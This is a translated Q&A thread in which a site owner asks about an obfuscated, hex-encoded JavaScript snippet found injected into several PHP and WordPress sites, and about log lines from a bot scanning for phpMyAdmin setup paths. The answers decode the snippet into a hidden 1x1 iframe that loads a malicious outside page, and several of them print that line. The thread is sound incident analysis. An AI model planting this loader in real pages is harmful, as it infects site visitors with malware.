这是一次可能的黑客攻击吗?

时间:2011-07-19 23:46:50

标签: javascript

前几天我的Q& A部分网站出现故障,所以我关闭了索引,因为我发现错误与语法错误有关。所以我删除它并使它死亡。但是,当我打开它时,我发现:

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>httpdocs/');<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>

我后来在多个PHP网站(例如wordpress'索引)中找到它,我想知道的是,如果有人知道它来自何处以及它的目的是什么。

我在日志中也发现了这一点,看起来很可疑:

87.106.166.95 - - [19/Jul/2011:00:03:14 +0400] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 301 552 "-" "-"
 87.106.166.95 - - [19/Jul/2011:00:03:15 +0400] "GET //phpadmin/scripts/setup.php HTTP/1.1" 301 544 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:16 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:16 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 474 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:17 +0400] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:18 +0400] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:18 +0400] "GET //pma/scripts/setup.php HTTP/1.1" 301 539 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:19 +0400] "GET //web/phpMyAdmin/scripts/setup.php     HTTP/1.1" 301 550 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:20 +0400] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 301 552 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:20 +0400] "GET //web/scripts/setup.php HTTP/1.1" 301 539 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:21 +0400] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //websql/scripts/setup.php HTTP/1.1" 301 542 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 474 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:23 +0400] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:24 +0400] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:24 +0400] "GET //sqlmanager/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:25 +0400] "GET //mysqlmanager/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:26 +0400] "GET //p/m/a/scripts/setup.php HTTP/1.1" 301 541 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:26 +0400] "GET //PMA2005/scripts/setup.php HTTP/1.1" 301 543 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:27 +0400] "GET //pma2005/scripts/setup.php HTTP/1.1" 301 543 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:28 +0400] "GET //phpmanager/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:28 +0400] "GET //php-myadmin/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:29 +0400] "GET //phpmy-admin/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:30 +0400] "GET //webadmin/scripts/setup.php HTTP/1.1" 301 544 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:30 +0400] "GET //sqlweb/scripts/setup.php HTTP/1.1" 301 542 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:31 +0400] "GET //websql/scripts/setup.php HTTP/1.1" 301 542 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:32 +0400] "GET //webdb/scripts/setup.php HTTP/1.1" 301 541 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:32 +0400] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:33 +0400] "GET //mysql-admin/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:33 +0400] "GET //databaseadmin/scripts/setup.php HTTP/1.1" 301 549 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:34 +0400] "GET //admm/scripts/setup.php HTTP/1.1" 301 540 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:35 +0400] "GET //admn/scripts/setup.php HTTP/1.1" 301 540 "-" "-"

5 个答案:

答案 0 :(得分:5)

是的,这看起来像是在黑客攻击您的网站后混淆恶意代码的常见方式。它可以执行任何数量的操作,并且通常链接到中央服务器,因此可以在以后修改其行为。

要确定此代码的作用,我们只需要运行它,将eval替换为console.log。这打印出来

document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')

网站的网址和内容是为了掩饰其目的。它当前服务于进一步混淆的页面。我expanded the code, here。它似乎会查看您的浏览器和插件的版本,以便为访问者定位病毒。

有很多机器人抓着互联网寻找易受攻击的软件版本,并自动将其黑客攻击。通常,尝试跟踪它们并不是非常简单或富有成效;只关注下次更安全。

答案 1 :(得分:0)

它来自黑客。

它的目的是破解你。

删除它,并升级你的防御。

答案 2 :(得分:0)

是的,有人获得了访问并插入了。它加密了javascript来修改页面。找出实际发生的事情的简单方法是用console.log()甚至alert()替换eval() - 这将为您提供代码。

我已经这样做了,这就是代码添加到页面的内容:

<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>

答案 3 :(得分:0)

这是通过wordpress,插件或服务器上运行的其他应用程序中的漏洞注入这些网站的代码。

该代码在去混淆时产生:

document.write('<iframe src="http://xxx/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')

(我已经删除了域名以确保安全; - ))

答案 4 :(得分:0)

如果您将eval更改为console.log,则会获得

document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')

该论坛帖子现在已被删除,因此它实际上不会做任何事情,但是,是的,你被黑了。